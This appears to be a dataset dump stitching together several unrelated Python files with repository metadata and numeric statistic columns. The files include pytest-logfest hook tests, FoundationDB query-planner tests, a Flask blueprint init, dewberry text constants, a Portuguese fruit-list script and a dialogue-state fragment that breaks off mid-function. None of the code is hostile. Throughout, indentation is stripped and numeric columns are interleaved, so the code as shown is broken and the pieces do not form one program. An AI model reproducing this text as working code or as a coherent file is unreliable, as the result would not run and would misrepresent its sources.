|
j19sch/pytest-logfest
|
02fefdd8b9b1d1663a473300e51e9045d1a2b811
|
[
"MIT"
] | 1
|
2021-08-18T17:59:56.000Z
|
2021-08-18T17:59:56.000Z
|
import os
from . import helpers
def test_basic_logging_filename_hook(testdir):
testdir.makeconftest("""
import pytest
@pytest.mark.optionalhook
def pytest_logfest_log_file_name_basic(filename_components):
filename_components.append("fizzbuzz")
""")
testdir.makepyfile("""
import pytest
def test_pass(function_logger):
pass
""")
result = testdir.runpytest(
'--logfest=basic', '--log-level=debug'
)
assert result.ret == 0
artifacts_dir = str(testdir.tmpdir.join('artifacts'))
assert os.path.isdir(artifacts_dir) is True
log_files = helpers.get_logfiles_in_testdir(artifacts_dir)
assert len(log_files) == 1
timestamp = helpers.get_timestamp_from_logfile_name(log_files[0])
basic_logfile = "session-%s-fizzbuzz.log" % timestamp
helpers.assert_filename_in_list_of_files(basic_logfile, log_files)
def test_full_logging_filename_hook_module(testdir):
testdir.makeconftest("""
import pytest
@pytest.mark.optionalhook
def pytest_logfest_log_file_name_full_module(filename_components):
filename_components.append("fizzbuzz")
""")
testdir.makepyfile("""
import pytest
def test_pass(function_logger):
pass
""")
result = testdir.runpytest(
'--logfest=full', '--log-level=debug'
)
assert result.ret == 0
artifacts_dir = str(testdir.tmpdir.join('artifacts'))
assert os.path.isdir(str(artifacts_dir)) is True
log_files = helpers.get_logfiles_in_testdir(artifacts_dir)
assert len(log_files) == 2
timestamp = helpers.get_timestamp_from_logfile_name(log_files[0])
full_logfile = "test_full_logging_filename_hook_module-%s-fizzbuzz.log" % timestamp
helpers.assert_filename_in_list_of_files(full_logfile, log_files)
def test_full_logging_filename_hook_session(testdir):
testdir.makeconftest("""
import pytest
@pytest.fixture(scope='session', autouse='true')
def session_log(session_logger):
session_logger.info("Session info log line")
@pytest.mark.optionalhook
def pytest_logfest_log_file_name_full_session(filename_components):
filename_components.append("fizzbuzz")
""")
testdir.makepyfile("""
import pytest
def test_pass(function_logger):
pass
""")
result = testdir.runpytest(
'--logfest=full', '--log-level=debug'
)
assert result.ret == 0
artifacts_dir = str(testdir.tmpdir.join('artifacts'))
assert os.path.isdir(str(artifacts_dir)) is True
log_files = helpers.get_logfiles_in_testdir(artifacts_dir)
assert len(log_files) == 3
timestamp = helpers.get_timestamp_from_logfile_name(log_files[0])
full_logfile_session = "test_full_logging_filename_hook_session0-%s-fizzbuzz.log" % timestamp
helpers.assert_filename_in_list_of_files(full_logfile_session, log_files)
| 26.972973
| 97
| 0.693387
| 359
| 2,994
| 5.445682
| 0.178273
| 0.049105
| 0.048593
| 0.047059
| 0.880307
| 0.866496
| 0.824041
| 0.824041
| 0.824041
| 0.781586
| 0
| 0.004203
| 0.205411
| 2,994
| 110
| 98
| 27.218182
| 0.81757
| 0
| 0
| 0.662162
| 0
| 0
| 0.408818
| 0.224449
| 0
| 0
| 0
| 0
| 0.162162
| 1
| 0.040541
| false
| 0.081081
| 0.108108
| 0
| 0.148649
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
1ba9872c2e23d16a2b0e86820e726922c652b5cc
| 105
|
py
|
Python
|
app/main/__init__.py
|
cassjs/pyrate-stocks
|
223e8246fc7eadb93f17234f639208759515d638
|
[
"MIT"
] | 4
|
2021-03-26T16:33:06.000Z
|
2021-09-21T17:26:34.000Z
|
app/main/__init__.py
|
cassjs/pyrate-stocks
|
223e8246fc7eadb93f17234f639208759515d638
|
[
"MIT"
] | 5
|
2021-03-20T00:34:29.000Z
|
2021-03-22T23:36:23.000Z
|
app/main/__init__.py
|
cassjs/pyrate-stocks
|
223e8246fc7eadb93f17234f639208759515d638
|
[
"MIT"
] | 3
|
2021-03-24T00:03:05.000Z
|
2021-05-21T08:04:36.000Z
|
from flask import Blueprint
main_bp = Blueprint('main_bp', __name__)
from app.main import views, errors
| 21
| 40
| 0.790476
| 16
| 105
| 4.8125
| 0.625
| 0.337662
| 0.38961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 105
| 5
| 41
| 21
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0.066038
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
9463a9213c210aa68c3bf333188d2fcf6ed1909d
| 14,135
|
py
|
Python
|
test/correctness/smoke/test_planner.py
|
kolesa-team/fdb-document-layer
|
d556bbf1a8f7cd3fd382943eb1694599b0bf15b3
|
[
"Apache-2.0"
] | 176
|
2018-11-29T19:49:24.000Z
|
2022-03-13T07:20:12.000Z
|
test/correctness/smoke/test_planner.py
|
kolesa-team/fdb-document-layer
|
d556bbf1a8f7cd3fd382943eb1694599b0bf15b3
|
[
"Apache-2.0"
] | 145
|
2018-11-29T21:56:37.000Z
|
2021-11-29T06:31:55.000Z
|
test/correctness/smoke/test_planner.py
|
kolesa-team/fdb-document-layer
|
d556bbf1a8f7cd3fd382943eb1694599b0bf15b3
|
[
"Apache-2.0"
] | 29
|
2018-11-29T19:37:56.000Z
|
2021-11-06T14:20:28.000Z
|
#
# test_planner.py
#
# This source file is part of the FoundationDB open source project
#
# Copyright 2013-2019 Apple Inc. and the FoundationDB project authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Predicates(object):
@staticmethod
def no_table_scan(explanation):
this_type = explanation['type']
if this_type == 'table scan':
return False
elif this_type == 'union':
return all([Predicates.no_table_scan(p) for p in explanation['plans']])
elif 'source_plan' in explanation:
return Predicates.no_table_scan(explanation['source_plan'])
else:
return True
@staticmethod
def only_index_named(index_name, explanation):
this_type = explanation['type']
if this_type == 'index scan' and explanation['index name'] == index_name:
return True
elif this_type == 'union':
return all([Predicates.only_index_named(index_name, p) for p in explanation['plans']])
elif 'source_plan' in explanation:
return Predicates.only_index_named(index_name, explanation['source_plan'])
else:
return False
@staticmethod
def pk_lookup(explanation):
this_type = explanation['type']
if this_type == 'PK lookup':
return True
elif this_type == 'union':
return all([Predicates.pk_lookup(p) for p in explanation['plans']])
elif 'source_plan' in explanation:
return Predicates.pk_lookup(explanation['source_plan'])
else:
return False
@staticmethod
def no_filter(explanation):
this_type = explanation['type']
if this_type == 'filter':
return False
elif this_type == 'union':
return all([Predicates.no_filter(p) for p in explanation['plans']])
elif 'source_plan' in explanation:
return Predicates.no_filter(explanation['source_plan'])
else:
return True
@staticmethod
def pk_lookup_no_filter(explanation):
return Predicates.pk_lookup(explanation) and Predicates.no_filter(explanation)
@staticmethod
def no_table_scan_no_filter(explanation):
return Predicates.no_table_scan(explanation) and Predicates.no_filter(explanation)
# PK Lookup Tests
def test_pk_lookup(fixture_collection):
ret = fixture_collection.find({'_id': 1}).explain()
assert Predicates.pk_lookup_no_filter(ret['explanation'])
def test_pk_scan(fixture_collection):
ret = fixture_collection.find({'_id': {'$gt': 1}}).explain()
assert Predicates.pk_lookup(ret['explanation'])
# Simple Index Tests
def test_simple_index_basic(fixture_collection):
fixture_collection.create_index(keys=[('a', 1)], name='index')
query = {'a': 1}
ret = fixture_collection.find(query).explain()
assert Predicates.no_table_scan_no_filter(ret['explanation'])
def test_simple_index_union(fixture_collection):
fixture_collection.create_index(keys=[('a', 1)], name='index1')
fixture_collection.create_index(keys=[('b', 1)], name='index2')
query = {
'$or': [{
"a": 1
}, {
"b": 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.no_table_scan(ret['explanation'])
def test_simple_index_compound_as_simple(fixture_collection):
fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='compound')
query = {'a': 1}
ret = fixture_collection.find(query).explain()
assert Predicates.no_table_scan_no_filter(ret['explanation'])
def test_simple_index_prefer_simple_over_compound(fixture_collection):
fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='compound')
fixture_collection.create_index(keys=[('a', 1)], name='simple')
query = {'a': 1}
ret = fixture_collection.find(query).explain()
assert Predicates.only_index_named('simple', ret['explanation'])
def test_simple_index_prefer_shorter_compound_index(fixture_collection):
fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1)], name='long')
fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='short')
query = {'a': 1}
ret = fixture_collection.find(query).explain()
assert Predicates.only_index_named('short', ret['explanation'])
def test_simple_index_greedy_plan(fixture_collection):
fixture_collection.create_index(keys=[('a', 1)], name='one')
fixture_collection.create_index(keys=[('b', 1)], name='two')
query = {
'$and': [{
'b': 1
}, {
'a': 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.only_index_named('two', ret['explanation'])
def test_simple_index_scan(fixture_collection):
fixture_collection.create_index(keys=[('a', 1)], name='index')
query = {
"a": {
'$gt': 1
}
}
ret = fixture_collection.find(query).explain()
assert Predicates.no_table_scan(ret['explanation'])
def test_simple_index_multi_union(fixture_collection):
fixture_collection.create_index(keys=[('d', 1)], name='index1')
fixture_collection.create_index(keys=[('c', 1)], name='index2')
fixture_collection.create_index(keys=[('b', 1)], name='index3')
fixture_collection.create_index(keys=[('a', 1)], name='index4')
query = {
'$or': [{
"a": {
'$gt': 1
}
}, {
"b": 1
}, {
"c": {
'$lte': 1
}
}, {
"d": 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.no_table_scan(ret['explanation'])
def test_simple_index_dotted_path(fixture_collection):
fixture_collection.create_index(keys=[('a.b', 1)], name='simple')
query = {'a.b': 'hello'}
ret = fixture_collection.find(query).explain()
assert Predicates.no_table_scan(ret['explanation'])
# Compound Index Tests
def test_compound_index_basic(fixture_collection):
fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='compound')
query = {
'$and': [{
'a': 1
}, {
'b': 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.no_table_scan_no_filter(ret['explanation'])
def test_compound_index_out_of_order(fixture_collection):
fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='compound')
query = {
'$and': [{
'b': 1
}, {
'a': 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.no_table_scan(ret['explanation'])
def test_compound_index_find_long_index(fixture_collection):
fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1), ('d', 1), ('e', 1), ('f', 1), ('g', 1)], name='long')
query = {
'$and': [{
'g': 1
}, {
'f': 1
}, {
'e': 1
}, {
'd': 1
}, {
'c': 1
}, {
'b': 1
}, {
'a': 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.no_table_scan(ret['explanation'])
def test_compound_index_union(fixture_collection):
fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='compound')
fixture_collection.create_index(keys=[('d', 1), ('c', 1)], name='compound2')
query = {
'$or': [{
'$and': [{
'b': 1
}, {
'a': 1
}]
}, {
'$and': [{
'd': 1
}, {
'c': 1
}]
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.no_table_scan(ret['explanation'])
def test_compound_index_range_at_end(fixture_collection):
fixture_collection.create_index(keys=[('d', 1), ('b', 1), ('c', 1)], name='compound')
fixture_collection.create_index(keys=[('d', 1)], name='simple')
query = {
'$and': [{
'c': {
'$gt': 1
}
}, {
'b': 1
}, {
'd': 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.only_index_named("compound", ret['explanation'])
def test_compound_index_range_at_start(fixture_collection):
fixture_collection.create_index(keys=[('d', 1), ('b', 1), ('c', 1)], name='compound')
fixture_collection.create_index(keys=[('d', 1)], name='simple')
query = {
'$and': [{
'd': {
'$gt': 1
}
}, {
'b': 1
}, {
'c': 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.only_index_named("simple", ret['explanation'])
def test_compound_index_range_at_middle(fixture_collection):
fixture_collection.create_index(keys=[('d', 1), ('b', 1), ('c', 1)], name='compound')
fixture_collection.create_index(keys=[('d', 1)], name='simple')
query = {
'$and': [{
'b': {
'$gt': 1
}
}, {
'd': 1
}, {
'c': 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.only_index_named("compound", ret['explanation'])
def test_compound_index_greedy_planner(fixture_collection):
fixture_collection.create_index(keys=[('d', 1), ('b', 1), ('c', 1)], name='long')
fixture_collection.create_index(keys=[('b', 1), ('c', 1)], name='short')
query = {
'$and': [{
'b': 1
}, {
'd': 1
}, {
'c': 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.only_index_named("short", ret['explanation'])
def test_compound_index_match_exact_index(fixture_collection):
fixture_collection.create_index(keys=[('a', 1)], name='a')
fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='ab')
fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1)], name='abc')
fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1), ('d', 1), ('e', 1)], name='abcde')
query = {
'$and': [{
'a': 1
}, {
'b': 1
}, {
'c': 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.only_index_named("abc", ret['explanation']) and Predicates.no_table_scan_no_filter(ret['explanation'])
def test_compound_index_match_longest_prefix(fixture_collection):
fixture_collection.create_index(keys=[('a', 1)], name='a')
fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='ab')
fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1)], name='abc')
fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1), ('d', 1), ('e', 1)], name='abcde')
query = {
'$and': [{
'a': 1
}, {
'b': 1
}, {
'c': 1
}, {
'd': 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.only_index_named("abcde", ret['explanation']) and Predicates.no_table_scan_no_filter(ret['explanation'])
def test_compound_index_match_non_contiguous_prefix(fixture_collection):
fixture_collection.create_index(keys=[('a', 1)], name='a')
fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='ab')
fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1)], name='abc')
fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1), ('d', 1), ('e', 1)], name='abcde')
query = {
'$and': [{
'a': 1
}, {
'b': 1
}, {
'c': 1
}, {
'e': 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.only_index_named("abc", ret['explanation']) and Predicates.no_table_scan(ret['explanation'])
def test_compound_index_multi_match(fixture_collection):
fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1), ('d', 1)], name='abcd')
fixture_collection.create_index(keys=[('a', 1), ('e', 1)], name='ae')
fixture_collection.create_index(keys=[('a', 1), ('d', 1)], name='ad')
fixture_collection.create_index(keys=[('d', 1), ('a', 1)], name='da')
fixture_collection.create_index(keys=[('e', 1)], name='e')
query = {
'$and': [{
'a': 1
}, {
'd': 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.only_index_named('ad', ret['explanation'])
assert Predicates.no_table_scan(ret['explanation'])
assert Predicates.no_filter(ret['explanation'])
query = {
'$and': [{
'a': 1
}, {
'd': 1
}, {
'e': 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.only_index_named('ad', ret['explanation'])
assert Predicates.no_table_scan(ret['explanation'])
query = {
'$and': [{
'd': 1
}, {
'a': 1
}]
}
ret = fixture_collection.find(query).explain()
assert Predicates.only_index_named('da', ret['explanation'])
assert Predicates.no_table_scan(ret['explanation'])
assert Predicates.no_filter(ret['explanation'])
query = {'d': 1}
ret = fixture_collection.find(query).explain()
assert Predicates.only_index_named('da', ret['explanation'])
assert Predicates.no_table_scan(ret['explanation'])
| 32.125
| 126
| 0.580686
| 1,661
| 14,135
| 4.717038
| 0.096328
| 0.206126
| 0.135035
| 0.164391
| 0.853861
| 0.834844
| 0.791704
| 0.754818
| 0.668922
| 0.65067
| 0
| 0.016769
| 0.253272
| 14,135
| 439
| 127
| 32.198178
| 0.725533
| 0.051362
| 0
| 0.688889
| 0
| 0
| 0.083819
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 1
| 0.080556
| false
| 0
| 0
| 0.005556
| 0.133333
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
84763873c1802b0d6feecf59da2eae0a15a2a840
| 93
|
py
|
Python
|
tests/data/format/quotes_type/variable_docstring.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 4
|
2022-01-02T22:50:59.000Z
|
2022-02-09T09:04:37.000Z
|
tests/data/format/quotes_type/variable_docstring.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 80
|
2022-01-02T09:02:50.000Z
|
2022-03-30T13:34:10.000Z
|
tests/data/format/quotes_type/variable_docstring.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 2
|
2022-01-02T11:58:29.000Z
|
2022-01-04T18:53:29.000Z
|
MYVAR = 1
''' A multi-line
docstring
'''
MYVAR = 1
''' A multi-line
docstring
'''
| 9.3
| 19
| 0.537634
| 12
| 93
| 4.166667
| 0.5
| 0.24
| 0.28
| 0.48
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.290323
| 93
| 9
| 20
| 10.333333
| 0.727273
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
84831e9e624b1b07e7b74663ef8bc48c178fecbd
| 1,347
|
py
|
Python
|
testing/data/list_constants.py
|
lizschley/number_six
|
a427202397822fca1f49d43d138c24fffdbe95da
|
[
"MIT"
] | 1
|
2020-07-14T20:13:05.000Z
|
2020-07-14T20:13:05.000Z
|
testing/data/list_constants.py
|
lizschley/number_six
|
a427202397822fca1f49d43d138c24fffdbe95da
|
[
"MIT"
] | 3
|
2021-04-06T20:40:08.000Z
|
2021-06-03T21:54:21.000Z
|
testing/data/list_constants.py
|
lizschley/number_six
|
a427202397822fca1f49d43d138c24fffdbe95da
|
[
"MIT"
] | null | null | null |
''' This is for list data that is stored in constants and used for Testing'''
KEYS_FOR_PARA_DISPLAY_CONTEXT = ['title', 'title_note', 'paragraphs']
TEXT_LIST_WITH_PARA_TAGS = [
'<p>If the stem on your ground-trailing vine is reddish in color with',
'red-tinted hairs and thin, fine thorns, it\'s a dewberry. Blackberries,',
'which grow upward, have no hairs, and the thorns are hard and tough.',
'The leaves of both are similar in appearance. If you come across a, stand',
'of berries that ripen in April or May, they are dewberries. Directly',
'quoted from'
'<a href="https://homeguides.sfgate.com/blackberry-vs-dewberry-fruit-85014.html"',
'target="_blank">SealJann_20200520_SFGate_BlackberryVsDewberry</a></p>'
]
TEXT_LIST_WITHOUT_PARA_TAGS = [
'If the stem on your ground-trailing vine is reddish in color with',
'red-tinted hairs and thin, fine thorns, it\'s a dewberry. Blackberries,',
'which grow upward, have no hairs, and the thorns are hard and tough.',
'The leaves of both are similar in appearance. If you come across a, stand',
'of berries that ripen in April or May, they are dewberries. Directly',
'quoted from'
'<a href="https://homeguides.sfgate.com/blackberry-vs-dewberry-fruit-85014.html"',
'target="_blank">SealJann_20200520_SFGate_BlackberryVsDewberry</a>'
]
| 51.807692
| 86
| 0.723088
| 205
| 1,347
| 4.64878
| 0.42439
| 0.033578
| 0.018888
| 0.023085
| 0.841553
| 0.841553
| 0.841553
| 0.841553
| 0.841553
| 0.841553
| 0
| 0.023214
| 0.168523
| 1,347
| 25
| 87
| 53.88
| 0.827679
| 0.051967
| 0
| 0.571429
| 0
| 0.047619
| 0.768504
| 0.105512
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ca5d26fe7fc4e9a98b08ead0b6c23cd72f502199
| 413
|
py
|
Python
|
Ex6.py
|
EduarTeixeira/Exercicios_LP_3B
|
dfbbd58e1a1c2033ee4f643cc5b60a86a7213f0a
|
[
"MIT"
] | null | null | null |
Ex6.py
|
EduarTeixeira/Exercicios_LP_3B
|
dfbbd58e1a1c2033ee4f643cc5b60a86a7213f0a
|
[
"MIT"
] | null | null | null |
Ex6.py
|
EduarTeixeira/Exercicios_LP_3B
|
dfbbd58e1a1c2033ee4f643cc5b60a86a7213f0a
|
[
"MIT"
] | null | null | null |
a = input("Digite o nome de uma fruta para adicionar na lista: ")
b = input("Digite o nome de uma fruta para adicionar na lista: ")
c = input("Digite o nome de uma fruta para adicionar na lista: ")
d = input("Digite o nome de uma fruta para adicionar na lista: ")
e = input("Digite o nome de uma fruta para adicionar na lista: ")
lista = [a, b, c, d, e]
print("O morango está na posição ", lista.index("Morango"))
| 59
| 65
| 0.697337
| 75
| 413
| 3.84
| 0.28
| 0.190972
| 0.208333
| 0.277778
| 0.798611
| 0.798611
| 0.798611
| 0.798611
| 0.798611
| 0.798611
| 0
| 0
| 0.188862
| 413
| 7
| 66
| 59
| 0.859701
| 0
| 0
| 0
| 0
| 0
| 0.707729
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
046be22fe1bbb42a1b68cfad3b700349244c1068
| 95
|
py
|
Python
|
hello-world/hello-world.py
|
gabrielcostasilva/python-basic-examples
|
d9c20887b94b823fc59bc82f250d39d76b918ad8
|
[
"MIT"
] | null | null | null |
hello-world/hello-world.py
|
gabrielcostasilva/python-basic-examples
|
d9c20887b94b823fc59bc82f250d39d76b918ad8
|
[
"MIT"
] | null | null | null |
hello-world/hello-world.py
|
gabrielcostasilva/python-basic-examples
|
d9c20887b94b823fc59bc82f250d39d76b918ad8
|
[
"MIT"
] | null | null | null |
print("Hello World Python!")
print("Hello world "+ input("Start by writing down your name: "))
| 31.666667
| 65
| 0.705263
| 14
| 95
| 4.785714
| 0.785714
| 0.298507
| 0.447761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136842
| 95
| 2
| 66
| 47.5
| 0.817073
| 0
| 0
| 0
| 0
| 0
| 0.673684
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
04bce2462f124d94de2afe9757e48629fd7235c6
| 41
|
py
|
Python
|
setmycfdns/__init__.py
|
Glocktober/setmycfdns
|
d1ad128095a204f1330f024bebff57fe3a3f1ee2
|
[
"MIT"
] | null | null | null |
setmycfdns/__init__.py
|
Glocktober/setmycfdns
|
d1ad128095a204f1330f024bebff57fe3a3f1ee2
|
[
"MIT"
] | null | null | null |
setmycfdns/__init__.py
|
Glocktober/setmycfdns
|
d1ad128095a204f1330f024bebff57fe3a3f1ee2
|
[
"MIT"
] | null | null | null |
from .set_my_cf_dns import set_my_cf_dns
| 20.5
| 40
| 0.878049
| 10
| 41
| 3
| 0.6
| 0.333333
| 0.466667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 41
| 1
| 41
| 41
| 0.810811
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
04c04ca9458bf86727f318f9cc01d9a5750fe5c0
| 108
|
py
|
Python
|
nature/bricks/activations/norm.py
|
bionicles/neuromax
|
a53a17a1c033c11ac607a9e28f43b1f906e58aad
|
[
"MIT"
] | null | null | null |
nature/bricks/activations/norm.py
|
bionicles/neuromax
|
a53a17a1c033c11ac607a9e28f43b1f906e58aad
|
[
"MIT"
] | null | null | null |
nature/bricks/activations/norm.py
|
bionicles/neuromax
|
a53a17a1c033c11ac607a9e28f43b1f906e58aad
|
[
"MIT"
] | null | null | null |
from tensorflow_addons.layers import InstanceNormalization
def Norm():
return InstanceNormalization()
| 18
| 58
| 0.814815
| 10
| 108
| 8.7
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 108
| 5
| 59
| 21.6
| 0.925532
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
8e1c58e86d1c290b39d6495a444d0371597e944a
| 4,305
|
py
|
Python
|
convlab/human_eval/simulate_conc.py
|
hwaranlee/SUMBT-LaRL
|
822235a2383631a97c49ed6d731b99093d427d6d
|
[
"MIT"
] | 1
|
2021-12-10T05:29:27.000Z
|
2021-12-10T05:29:27.000Z
|
convlab/human_eval/simulate_conc.py
|
hwaranlee/SUMBT-LaRL
|
822235a2383631a97c49ed6d731b99093d427d6d
|
[
"MIT"
] | null | null | null |
convlab/human_eval/simulate_conc.py
|
hwaranlee/SUMBT-LaRL
|
822235a2383631a97c49ed6d731b99093d427d6d
|
[
"MIT"
] | null | null | null |
import time
import json
import random
from urllib.error import URLError
from urllib import request
import http.client
import requests
import gevent
from gevent import monkey
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
ctx = app.app_context()
ctx.push()
import json
class SetEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
return json.JSONEncoder.default(self, obj)
def run():
dst_state = {'user_action': {'Restaurant-Inform': []}, 'belief_state': {'police': {'book': {'booked': []}, 'semi': {}}, 'hotel': {'book': {'booked': [], 'people': '', 'day': '', 'stay': ''}, 'semi': {'name': '', 'area': '', 'parking': '', 'pricerange': '', 'stars': '', 'internet': '', 'type': ''}}, 'attraction': {'book': {'booked': []}, 'semi': {'type': '', 'name': '', 'area': '', 'entrance fee': ''}}, 'restaurant': {'book': {'booked': [], 'people': '', 'day': '', 'time': ''}, 'semi': {'food': '', 'pricerange': '', 'name': '', 'area': ''}}, 'hospital': {'book': {'booked': []}, 'semi': {'department': ''}}, 'taxi': {'book': {'booked': [], 'departure': '', 'destination': ''}, 'semi': {'leaveAt': '', 'arriveBy': ''}}, 'train': {'book': {'booked': [], 'people': '', 'trainID': ''}, 'semi': {'leaveAt': '', 'destination': '', 'day': '', 'arriveBy': '', 'departure': ''}}}, 'request_state': {}, 'history': [['null', 'I want a resturant']], 'prev_domains': ['Restaurant']}
